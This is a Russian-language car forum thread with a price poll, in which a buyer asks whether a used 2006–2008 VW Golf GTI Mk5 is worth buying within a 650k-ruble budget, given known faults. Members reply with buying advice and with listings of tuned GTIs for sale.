Результаты опроса: Сколько по-вашему должен стоить "стоковый" GTI MK5 (08г.в.) без вложений?

Голосовавшие
21. Вы ещё не голосовали в этом опросе
  • от 600К до 650К

2 9.52%
  • от 650К до 700К

11 52.38%
  • если дешевле 700К - не стоит смотреть

8 38.10%
+ Ответить в теме
Показано с 1 по 4 из 4

Тема: Куплю GTI МК5. Дилемма: брать или ждать?

Мимо проходил Tatarenkov is on a distinguished road Аватар для Tatarenkov
    Машина
    VW

Куплю GTI МК5. Дилемма: брать или ждать?

Здравствуйте, уважаемые резиденты GTI club!
    Всем хороших выходных..! Сегодня с утра, за чашкой кофе, или наткнувшись на это сообщение на работе, задумайтесь и вспомните: может быть есть на примете живой MK5GTI, который ищет нового хозяина..? :)

Расскажу все по порядку. Желание обладать GTI появилось очень давно: когда MK5 заменил в showroom'ах четвертое поколение. В общем, МК5GTI сразу стал для меня стимулом, достижением, к которому нужно срочно стремиться. Стремиться я начал со старта: два года МК2, за ним еще два - МК4... Логичный читатель заметит тренд и скажет, что следующим на пару лет станет МК6! Но отсутствие спонсоров/меценатов/и пр.бонусов не позволяет перескакивать Пятое поколение, если речь идет о GTI. А она идет исключительно о GTI.

Посмотрел объявления на авто.ру. В те деньги, какими располагаю (max 650т.р.), вылетело несколько 5 машин 2006-2008 г.в. Легче не стало, т.к. тут же я узнал Кучу всяких страшилок о "болячках" машины (поправьте если ошибаюсь): клапан бай-пасса (по сути, ломаясь, превращает турбину в бесполезную железяку), толкатель ТНВД (общая запарка для всех авто с 2.0 TFSI) и что-то еще "третье"! Положение усугубляют: год выпуска, т.к. больше шанс получить "убитый" GTI; владельцы, зачастую не первые; дороги, как правило, не ровные. ) И если на последнее все как-то забили уже... то с остальными аспектами не хотелось бы сталкиваться. Хочется сказать "Я, пусть с рук, но купил свою мечту!" БЕЗ прибавки "но спустя месяц машина посыпалась, и теперь у меня новая мечта - продать GTI!" Так не хочу... Поэтому обращаюсь к вам за помощью (ну или советом).

Заметил интересный момент: одни владельцы в курсе этих проблем и называют их "врожденными", другие вообще ничего не знают, т.к. не ломалось и вообще он туда не лазил. При этом машины одного года! Что это? Случайность? Или разные режимы эксплуатации?

Буду признателен за любую помощь/инфу. Если кинете пару ссылок на затронутые темы - вообще спасибо! И потом, GTI - их не так много, машины известные (Московские), а продавцы, скорее всего, активно пишут на этом форуме. Будет здорово, если кто-нибудь расскажет чуть больше правды, чем написано на авто.ру
    Я вот к чему: если купить 5GTI, который не заставит работать только на себя, при моем бюджете невозможно - скажите об этом прямо, потому что вы уже выбрали и купили GTI. Гольф - машина которую нужно захотеть! К этому выбору невозможно прийти логическим путем, потому что Логика определит другое авто...

Это я к чему (?): Сменив 2 Гольфика (пусть не турбированных), я с огромной грустью расставался с каждым из das auto. Не хотелось бы нарушать эту "грустную" традицию впредь... :) Ну, вы понимаете...)

Заранее спасибо вам. Михаил.

тескам привет
    http://www.gti-club.ru/forum/showthread.php?t=16907
    ценник 820 + возможен торг

GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Машина
    VW Golf GTI Mk5 DSG
    Цитата Сообщение от Tatarenkov Посмотреть сообщение
    Легче не стало, т.к. тут же я узнал Кучу всяких страшилок о "болячках" машины (поправьте если ошибаюсь): клапан бай-пасса (по сути, ломаясь, превращает турбину в бесполезную железяку), толкатель ТНВД (общая запарка для всех авто с 2.0 TFSI) и что-то еще "третье"!
    Друг мой, это быть может и болячки, но они стоят копейки! Как вообще на это внимание можно обращать? )))

Если берешь б/у авто, то главное чтобы кузов был нормальный. Дальше двигатель, электрика, трансмиссия и ходовая. Но основное - кузов. Если автомобиль не был в жесткой аварии, то уже нормально. А уж если ничего в плане электрики не глючит, да ещё и коробка работает на ура, ну подвеска не гремит, - то можно брать )

Детские болезни, так же как и не детские, есть у любого современного автомобиля.
    С уважением, Василий.

My onboard video.

GTI-Racing Filya is on a distinguished road Аватар для Filya
    Машина
    С 300 4М
    GTI 5, пробег 30К (реальный). Черный 5 дверей, DSG, кожа, навигация, максимум кроме люка. винты Бильштайн, впуск, выпуск APR, чип APR, обвес Ригер, диф квайф. тормоза передний составные. OZ Ultralleggera. Резина дорогая лето+зима. дополнительная шумоизоляция. приличная акустика и усилители. есть (пока не установлены) подиум с дополнительными приборами и весь комплект для их подключения. ну и куча штатныйх и запасных запчастей
    В гонках не участвовал.
    1М рублей

+ Ответить в теме